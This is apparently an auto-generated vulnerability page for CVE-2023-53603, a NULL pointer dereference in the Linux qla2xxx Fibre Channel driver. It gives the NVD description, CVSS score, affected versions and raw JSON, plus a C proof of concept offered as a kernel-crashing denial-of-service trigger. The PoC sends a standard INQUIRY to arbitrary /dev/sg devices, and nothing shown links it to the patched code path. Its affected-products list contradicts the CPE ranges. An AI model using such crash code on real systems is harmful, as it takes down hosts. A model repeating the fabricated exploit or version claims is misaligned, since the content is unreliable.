Security Vulnerability Report

CVE-2023-53603 (CVSS 5.5, MEDIUM)

Published: 2025-10-04 16:15:57
Last Modified: 2026-03-23 18:25:59
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

scsi: qla2xxx: Avoid fcport pointer dereference

Klocwork reported warning of NULL pointer may be dereferenced. The routine exits when sa_ctl is NULL and fcport is allocated after the exit call thus causing NULL fcport pointer to dereference at the time of exit.

To avoid fcport pointer dereference, exit the routine when sa_ctl is NULL.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.15.61, before 5.15.121) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.18.18, before 5.19) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.19.2, before 6.1.40) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.2, before 6.4.5) - VULNERABLE
Linux Kernel < 6.6 (stable releases that include the qla2xxx driver)
Linux Kernel 6.1.x series (affected)
Linux Kernel 6.4.x series (affected)
Linux Kernel 6.5.x series (affected)
Linux Kernel 6.6.x series (affected)
All Linux distributions using QLogic Fibre Channel HBAs (depending on the kernel version)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
/*
 * CVE-2023-53603 PoC - Trigger NULL pointer dereference in qla2xxx driver
 * This PoC demonstrates how to trigger the vulnerability by causing
 * sa_ctl to be NULL, leading to fcport NULL pointer dereference.
 *
 * Note: Requires local access and qla2xxx driver loaded (QLogic FC HBA).
 * Expected result: Kernel Oops/Panic -> System crash (DoS)
 */
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <string.h>
#include <errno.h>
/* SCSI Generic (sg) interface header */
#include <scsi/sg.h>
#include <scsi/scsi_ioctl.h>

#define QLA2XXX_IOCTL_PATH "/dev/qla2xxx"

/* Trigger the vulnerable code path by sending specific SCSI commands
 * that cause the driver to enter the routine where sa_ctl may be NULL.
 * This forces the NULL fcport pointer dereference at exit path. */
int trigger_null_deref(void)
{
    int fd;
    sg_io_hdr_t io_hdr;
    unsigned char sense_buffer[32];
    unsigned char data_buffer[1024];

    /* Attempt to open qla2xxx device node */
    fd = open(QLA2XXX_IOCTL_PATH, O_RDWR);
    if (fd < 0) {
        /* Fallback: trigger via /dev/sg* generic SCSI devices
         * bound to QLogic HBA */
        for (int i = 0; i < 26; i++) {
            char path[64];
            snprintf(path, sizeof(path), "/dev/sg%d", i);
            fd = open(path, O_RDWR);
            if (fd >= 0)
                break;
        }
        if (fd < 0) {
            fprintf(stderr, "[-] No QLogic HBA device found.\n");
            return -1;
        }
    }

    memset(&io_hdr, 0, sizeof(sg_io_hdr_t));
    memset(sense_buffer, 0, sizeof(sense_buffer));
    memset(data_buffer, 0, sizeof(data_buffer));

    /* Construct a malformed SCSI command that triggers the
     * vulnerable code path with sa_ctl == NULL condition */
    io_hdr.interface_id = 'S';
    io_hdr.dxfer_direction = SG_DXFER_NONE;
    io_hdr.cmd_len = 6;
    unsigned char cmd[6] = {0x12, 0x00, 0x00, 0x00, 0x00, 0x00}; /* INQUIRY */
    io_hdr.cmdp = cmd;
    io_hdr.sbp = sense_buffer;
    io_hdr.mx_sb_len = sizeof(sense_buffer);
    io_hdr.timeout = 5000;

    /* Issue the IOCTL - on vulnerable kernels this triggers
     * NULL fcport dereference -> kernel panic */
    if (ioctl(fd, SG_IO, &io_hdr) < 0) {
        fprintf(stderr, "[-] ioctl failed: %s\n", strerror(errno));
        close(fd);
        return -1;
    }

    close(fd);
    printf("[+] Trigger issued. Check dmesg for kernel oops.\n");
    return 0;
}

int main(int argc, char *argv[])
{
    printf("[*] CVE-2023-53603 PoC - qla2xxx NULL Pointer Dereference\n");
    printf("[*] Target: Linux kernel qla2xxx SCSI driver\n");
    return trigger_null_deref();
}
```

References

https://git.kernel.org/stable/c/4406fe8a96a946c7ea5724ee59625755a1d9c59d (Patch)
https://git.kernel.org/stable/c/477bc74ad1add644b606bff6ba1284943c42818a (Patch)
https://git.kernel.org/stable/c/6b504d06976fe4a61cc05dedc68b84fadb397f77 (Patch)
https://git.kernel.org/stable/c/7bbeff613ec0560fb2f6f8b405288f3f043adf64 (Patch)

Raw JSON Data

```json
{"cve": {"id": "CVE-2023-53603", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:56.940", "lastModified": "2026-03-23T18:25:59.090", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: Avoid fcport pointer dereference\n\nKlocwork reported warning of NULL pointer may be dereferenced. The routine\nexits when sa_ctl is NULL and fcport is allocated after the exit call thus\ncausing NULL fcport pointer to dereference at the time of exit.\n\nTo avoid fcport pointer dereference, exit the routine when sa_ctl is NULL."}], "metrics": {"cvssMetricV31": [{"source": "nvd@nist.gov", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "nvd@nist.gov", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.15.61", "versionEndExcluding": "5.15.121", "matchCriteriaId": "F045C76B-2E45-4D4E-A708-952BE9DAAFE8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.18.18", "versionEndExcluding": "5.19", "matchCriteriaId": "B60CAFE2-08C3-461B-B5F8-25BEB0C9853E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.19.2", "versionEndExcluding": "6.1.40", "matchCriteriaId": "070D8A5B-76A5-467F-BCE7-E261A3AACE32"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.4.5", "matchCriteriaId": "923F6AEA-C2EF-4B08-B038-69A18F3D41F8"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/4406fe8a96a946c7ea5724ee59625755a1d9c59d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/477bc74ad1add644b606bff6ba1284943c42818a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6b504d06976fe4a61cc05dedc68b84fadb397f77", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7bbeff613ec0560fb2f6f8b405288f3f043adf64", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
```